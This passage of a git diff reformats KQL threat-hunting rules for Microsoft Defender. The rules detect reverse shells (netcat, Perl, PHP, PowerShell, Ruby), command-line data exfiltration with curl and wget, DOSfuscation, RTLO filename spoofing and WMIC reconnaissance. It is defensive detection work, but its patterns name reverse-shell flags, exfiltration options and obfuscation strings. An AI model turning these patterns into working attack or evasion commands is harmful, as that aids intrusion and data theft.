Tags: attack.execution, attack.t1059.003 +// False Positives: +// - Java tools are known to produce false-positive when loading libraries + +DeviceProcessEvents | where (((InitiatingProcessCommandLine contains "/c" or InitiatingProcessCommandLine contains "/k" or InitiatingProcessCommandLine contains "/r") or (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/k" or ProcessCommandLine contains "/r")) and (InitiatingProcessFolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "cmd.exe") and (InitiatingProcessCommandLine =~ "/../../" or ProcessCommandLine contains "/../../")) and (not(ProcessCommandLine contains "\\Tasktop\\keycloak\\bin\\/../../jre\\bin\\java")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_cookies_session_hijacking.kql b/KQL/rules/Execution/potential_cookies_session_hijacking.kql index 5744e7cb..04d151e4 100644 --- a/KQL/rules/Execution/potential_cookies_session_hijacking.kql +++ b/KQL/rules/Execution/potential_cookies_session_hijacking.kql @@ -1,10 +1,10 @@ -// Title: Potential Cookies Session Hijacking -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-07-27 -// Level: medium -// Description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie data. -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Potential Cookies Session Hijacking +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-27 +// Level: medium +// Description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie data. +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (ProcessCommandLine matches regex "\\s-c\\s" or ProcessCommandLine contains "--cookie-jar") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql b/KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql index 56d074aa..e61428b7 100644 --- a/KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql +++ b/KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql @@ -1,12 +1,12 @@ -// Title: Potential Data Exfiltration Activity Via CommandLine Tools -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-02 -// Level: high -// Description: Detects the use of various CLI utilities exfiltrating data via web requests -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Data Exfiltration Activity Via CommandLine Tools +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-02 +// Level: high +// Description: Detects the use of various CLI utilities exfiltrating data via web requests +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (((ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and (ProcessCommandLine contains " -ur" and ProcessCommandLine contains " -me" and ProcessCommandLine contains " -b" and ProcessCommandLine contains " POST ") and (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or ((ProcessCommandLine contains "--ur" and FolderPath endswith "\\curl.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " --data ")) or ((ProcessCommandLine contains "--post-data" or ProcessCommandLine contains "--post-file") and FolderPath endswith "\\wget.exe")) and ((ProcessCommandLine matches regex "net\\s+view" or ProcessCommandLine matches regex "sc\\s+query") or (ProcessCommandLine contains "Get-Content" or ProcessCommandLine contains "GetBytes" or ProcessCommandLine contains "hostname" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "qprocess" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "ToBase64String" or ProcessCommandLine contains "whoami") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > " and ProcessCommandLine contains " C:\\")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql b/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql index 12744408..611e3534 100644 --- a/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql +++ b/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql @@ -1,14 +1,14 @@ -// Title: Potential DLL Injection Via AccCheckConsole -// Author: Florian Roth (Nextron Systems) -// Date: 2022-01-06 -// Level: medium -// Description: Detects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI. -// One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc. -// The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility. -// MITRE Tactic: Execution -// Tags: attack.execution, detection.threat-hunting -// False Positives: -// - Legitimate use of the UI Accessibility Checker - -DeviceProcessEvents +// Title: Potential DLL Injection Via AccCheckConsole +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-06 +// Level: medium +// Description: Detects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI. +// One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc. +// The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility. +// MITRE Tactic: Execution +// Tags: attack.execution, detection.threat-hunting +// False Positives: +// - Legitimate use of the UI Accessibility Checker + +DeviceProcessEvents | where (ProcessCommandLine contains " -hwnd" or ProcessCommandLine contains " -process " or ProcessCommandLine contains " -window ") and (FolderPath endswith "\\AccCheckConsole.exe" or ProcessVersionInfoOriginalFileName =~ "AccCheckConsole.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_dosfuscation_activity.kql b/KQL/rules/Execution/potential_dosfuscation_activity.kql index e4dd8aca..204f0363 100644 --- a/KQL/rules/Execution/potential_dosfuscation_activity.kql +++ b/KQL/rules/Execution/potential_dosfuscation_activity.kql @@ -1,10 +1,10 @@ -// Title: Potential Dosfuscation Activity -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-02-15 -// Level: medium -// Description: Detects possible payload obfuscation via the commandline -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Potential Dosfuscation Activity +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-02-15 +// Level: medium +// Description: Detects possible payload obfuscation via the commandline +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where ProcessCommandLine contains "^^" or ProcessCommandLine contains "^|^" or ProcessCommandLine contains ",;," or ProcessCommandLine contains ";;;;" or ProcessCommandLine contains ";; ;;" or ProcessCommandLine contains "(,(," or ProcessCommandLine contains "%COMSPEC:~" or ProcessCommandLine contains " c^m^d" or ProcessCommandLine contains "^c^m^d" or ProcessCommandLine contains " c^md" or ProcessCommandLine contains " cm^d" or ProcessCommandLine contains "^cm^d" or ProcessCommandLine contains " s^et " or ProcessCommandLine contains " s^e^t " or ProcessCommandLine contains " se^t " \ No newline at end of file diff --git a/KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql b/KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql index 84081c5a..abc4ecbe 100644 --- a/KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql +++ b/KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql @@ -1,12 +1,12 @@ -// Title: Potential Dropper Script Execution Via WScript/CScript -// Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-01-16 -// Level: medium -// Description: Detects wscript/cscript executions of scripts located in user directories -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.005, attack.t1059.007 -// False Positives: -// - Some installers might generate a similar behavior. An initial baseline is required - -DeviceProcessEvents +// Title: Potential Dropper Script Execution Via WScript/CScript +// Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-01-16 +// Level: medium +// Description: Detects wscript/cscript executions of scripts located in user directories +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.t1059.007 +// False Positives: +// - Some installers might generate a similar behavior. An initial baseline is required + +DeviceProcessEvents | where (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe") and (ProcessCommandLine contains ".js" or ProcessCommandLine contains ".jse" or ProcessCommandLine contains ".vba" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".wsf") and (ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Tmp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql b/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql index dac1bc7c..3b9e8ffa 100644 --- a/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql +++ b/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql @@ -1,12 +1,12 @@ -// Title: Potential File Extension Spoofing Using Right-to-Left Override -// Author: Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2024-11-17 -// Level: high -// Description: Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1036.002 -// False Positives: -// - Filenames that contains scriptures such as arabic or hebrew might make use of this character - -DeviceFileEvents +// Title: Potential File Extension Spoofing Using Right-to-Left Override +// Author: Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2024-11-17 +// Level: high +// Description: Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1036.002 +// False Positives: +// - Filenames that contains scriptures such as arabic or hebrew might make use of this character + +DeviceFileEvents | where (FolderPath contains "3pm." or FolderPath contains "4pm." or FolderPath contains "cod." or FolderPath contains "fdp." or FolderPath contains "ftr." or FolderPath contains "gepj." or FolderPath contains "gnp." or FolderPath contains "gpj." or FolderPath contains "ism." or FolderPath contains "lmth." or FolderPath contains "nls." or FolderPath contains "piz." or FolderPath contains "slx." or FolderPath contains "tdo." or FolderPath contains "vsc." or FolderPath contains "vwm." or FolderPath contains "xcod." or FolderPath contains "xslx." or FolderPath contains "xtpp.") and (FolderPath contains "\\u202e" or FolderPath contains "[U+202E]") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql b/KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql index 42d7fd78..12da21c2 100644 --- a/KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql +++ b/KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql @@ -1,12 +1,12 @@ -// Title: Potential Netcat Reverse Shell Execution -// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-07 -// Level: high -// Description: Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Netcat Reverse Shell Execution +// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-07 +// Level: high +// Description: Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -e ") and (FolderPath endswith "/nc" or FolderPath endswith "/ncat") and (ProcessCommandLine contains " ash" or ProcessCommandLine contains " bash" or ProcessCommandLine contains " bsh" or ProcessCommandLine contains " csh" or ProcessCommandLine contains " ksh" or ProcessCommandLine contains " pdksh" or ProcessCommandLine contains " sh" or ProcessCommandLine contains " tcsh" or ProcessCommandLine contains "/bin/ash" or ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/bsh" or ProcessCommandLine contains "/bin/csh" or ProcessCommandLine contains "/bin/ksh" or ProcessCommandLine contains "/bin/pdksh" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/tcsh" or ProcessCommandLine contains "/bin/zsh" or ProcessCommandLine contains "$IFSash" or ProcessCommandLine contains "$IFSbash" or ProcessCommandLine contains "$IFSbsh" or ProcessCommandLine contains "$IFScsh" or ProcessCommandLine contains "$IFSksh" or ProcessCommandLine contains "$IFSpdksh" or ProcessCommandLine contains "$IFSsh" or ProcessCommandLine contains "$IFStcsh" or ProcessCommandLine contains "$IFSzsh") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_perl_reverse_shell_execution.kql b/KQL/rules/Execution/potential_perl_reverse_shell_execution.kql index 33cca89b..5c8bb537 100644 --- a/KQL/rules/Execution/potential_perl_reverse_shell_execution.kql +++ b/KQL/rules/Execution/potential_perl_reverse_shell_execution.kql @@ -1,12 +1,12 @@ -// Title: Potential Perl Reverse Shell Execution -// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-07 -// Level: high -// Description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Perl Reverse Shell Execution +// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-07 +// Level: high +// Description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine contains "fdopen(" and ProcessCommandLine contains "::Socket::INET") or (ProcessCommandLine contains "Socket" and ProcessCommandLine contains "connect" and ProcessCommandLine contains "open" and ProcessCommandLine contains "exec")) and (ProcessCommandLine contains " -e " and FolderPath endswith "/perl") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql b/KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql index 809a89fa..f3ac8f24 100644 --- a/KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql +++ b/KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql @@ -1,10 +1,10 @@ -// Title: Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-14 -// Level: medium -// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, attack.t1059 - -DeviceProcessEvents +// Title: Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-14 +// Level: medium +// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.t1059 + +DeviceProcessEvents | where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_php_reverse_shell.kql b/KQL/rules/Execution/potential_php_reverse_shell.kql index 72d10fd9..a07b6c4a 100644 --- a/KQL/rules/Execution/potential_php_reverse_shell.kql +++ b/KQL/rules/Execution/potential_php_reverse_shell.kql @@ -1,11 +1,11 @@ -// Title: Potential PHP Reverse Shell -// Author: @d4ns4n_ -// Date: 2023-04-07 -// Level: high -// Description: Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. -// Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection. -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Potential PHP Reverse Shell +// Author: @d4ns4n_ +// Date: 2023-04-07 +// Level: high +// Description: Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. +// Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection. +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (ProcessCommandLine contains "ash" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "bsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "pdksh" or ProcessCommandLine contains "sh" or ProcessCommandLine contains "tcsh" or ProcessCommandLine contains "zsh") and (ProcessCommandLine contains " -r " and ProcessCommandLine contains "fsockopen") and FolderPath contains "/php" \ No newline at end of file diff --git a/KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql b/KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql index 4526a676..7303a9b9 100644 --- a/KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql +++ b/KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql @@ -1,13 +1,13 @@ -// Title: Potential PowerShell Command Line Obfuscation -// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) -// Date: 2020-10-15 -// Level: high -// Description: Detects the PowerShell command lines with special characters -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1027, attack.t1059.001 -// False Positives: -// - Amazon SSM Document Worker -// - Windows Defender ATP - -DeviceProcessEvents +// Title: Potential PowerShell Command Line Obfuscation +// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) +// Date: 2020-10-15 +// Level: high +// Description: Detects the PowerShell command lines with special characters +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1027, attack.t1059.001 +// False Positives: +// - Amazon SSM Document Worker +// - Windows Defender ATP + +DeviceProcessEvents | where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine matches regex "\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+" or ProcessCommandLine matches regex "\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{" or ProcessCommandLine matches regex "\\^.*\\^.*\\^.*\\^.*\\^" or ProcessCommandLine matches regex "`.*`.*`.*`.*`")) and (not((InitiatingProcessFolderPath =~ "C:\\Program Files\\Amazon\\SSM\\ssm-document-worker.exe" or (ProcessCommandLine contains "new EventSource(\"Microsoft.Windows.Sense.Client.Management\"" or ProcessCommandLine contains "public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);")))) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql b/KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql index 072d65ce..977bfd90 100644 --- a/KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql +++ b/KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql @@ -1,10 +1,10 @@ -// Title: Potential PowerShell Obfuscation Via WCHAR/CHAR -// Author: Florian Roth (Nextron Systems) -// Date: 2020-07-09 -// Level: high -// Description: Detects suspicious encoded character syntax often used for defense evasion -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027 - -DeviceProcessEvents +// Title: Potential PowerShell Obfuscation Via WCHAR/CHAR +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-09 +// Level: high +// Description: Detects suspicious encoded character syntax often used for defense evasion +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027 + +DeviceProcessEvents | where ProcessCommandLine contains "[char]0x" or ProcessCommandLine contains "(WCHAR)0x" \ No newline at end of file diff --git a/KQL/rules/Execution/potential_powershell_reverseshell_connection.kql b/KQL/rules/Execution/potential_powershell_reverseshell_connection.kql index 59b853a3..339c452d 100644 --- a/KQL/rules/Execution/potential_powershell_reverseshell_connection.kql +++ b/KQL/rules/Execution/potential_powershell_reverseshell_connection.kql @@ -1,12 +1,12 @@ -// Title: Potential Powershell ReverseShell Connection -// Author: FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-03-03 -// Level: high -// Description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - In rare administrative cases, this function might be used to check network connectivity - -DeviceProcessEvents +// Title: Potential Powershell ReverseShell Connection +// Author: FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-03-03 +// Level: high +// Description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - In rare administrative cases, this function might be used to check network connectivity + +DeviceProcessEvents | where (ProcessCommandLine contains " Net.Sockets.TCPClient" and ProcessCommandLine contains ".GetStream(" and ProcessCommandLine contains ".Write(") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql index d8a9aad1..a969a81b 100644 --- a/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql +++ b/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql @@ -1,14 +1,14 @@ -// Title: Potential Product Class Reconnaissance Via Wmic.EXE -// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2023-02-14 -// Level: medium -// Description: Detects the execution of WMIC in order to get a list of firewall, antivirus and antispywware products. -// Adversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms. -// This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047, attack.discovery, attack.t1082 -// False Positives: -// - Legitimate use of wmic.exe for reconnaissance of firewall, antivirus and antispywware products. - -DeviceProcessEvents +// Title: Potential Product Class Reconnaissance Via Wmic.EXE +// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2023-02-14 +// Level: medium +// Description: Detects the execution of WMIC in order to get a list of firewall, antivirus and antispywware products. +// Adversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms. +// This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, attack.discovery, attack.t1082 +// False Positives: +// - Legitimate use of wmic.exe for reconnaissance of firewall, antivirus and antispywware products. + +DeviceProcessEvents | where (ProcessCommandLine contains "AntiVirusProduct" or ProcessCommandLine contains "AntiSpywareProduct" or ProcessCommandLine contains "FirewallProduct") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql index 6d63984f..b5a3d18b 100644 --- a/KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql +++ b/KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql @@ -1,10 +1,10 @@ -// Title: Potential Product Reconnaissance Via Wmic.EXE -// Author: Nasreddine Bencherchali -// Date: 2023-02-14 -// Level: medium -// Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047 - -DeviceProcessEvents +// Title: Potential Product Reconnaissance Via Wmic.EXE +// Author: Nasreddine Bencherchali +// Date: 2023-02-14 +// Level: medium +// Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents | where (ProcessCommandLine contains "Product" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains " uninstall" or ProcessCommandLine contains " install"))) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql b/KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql index afa346a8..eb7c9a45 100644 --- a/KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql +++ b/KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql @@ -1,12 +1,12 @@ -// Title: Potential RDP Session Hijacking Activity -// Author: @juju4 -// Date: 2022-12-27 -// Level: medium -// Description: Detects potential RDP Session Hijacking activity on Windows systems -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Administrative activity - -DeviceProcessEvents +// Title: Potential RDP Session Hijacking Activity +// Author: @juju4 +// Date: 2022-12-27 +// Level: medium +// Description: Detects potential RDP Session Hijacking activity on Windows systems +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Administrative activity + +DeviceProcessEvents | where (FolderPath endswith "\\tscon.exe" or ProcessVersionInfoOriginalFileName =~ "tscon.exe") and (ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql b/KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql index 050501fc..7b35469e 100644 --- a/KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql +++ b/KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql @@ -1,10 +1,10 @@ -// Title: Potential ReflectDebugger Content Execution Via WerFault.EXE -// Author: X__Junior (Nextron Systems) -// Date: 2023-06-30 -// Level: medium -// Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1036 - -DeviceProcessEvents +// Title: Potential ReflectDebugger Content Execution Via WerFault.EXE +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-30 +// Level: medium +// Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1036 + +DeviceProcessEvents | where ProcessCommandLine contains " -pr " and (FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_renamed_rundll32_execution.kql b/KQL/rules/Execution/potential_renamed_rundll32_execution.kql index 15309365..ee44514b 100644 --- a/KQL/rules/Execution/potential_renamed_rundll32_execution.kql +++ b/KQL/rules/Execution/potential_renamed_rundll32_execution.kql @@ -1,12 +1,12 @@ -// Title: Potential Renamed Rundll32 Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-22 -// Level: high -// Description: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Renamed Rundll32 Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-22 +// Level: high +// Description: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "DllRegisterServer" and (not(FolderPath endswith "\\rundll32.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_ruby_reverse_shell.kql b/KQL/rules/Execution/potential_ruby_reverse_shell.kql index 1d9b0d62..402db2cf 100644 --- a/KQL/rules/Execution/potential_ruby_reverse_shell.kql +++ b/KQL/rules/Execution/potential_ruby_reverse_shell.kql @@ -1,10 +1,10 @@ -// Title: Potential Ruby Reverse Shell -// Author: @d4ns4n_ -// Date: 2023-04-07 -// Level: medium -// Description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Potential Ruby Reverse Shell +// Author: @d4ns4n_ +// Date: 2023-04-07 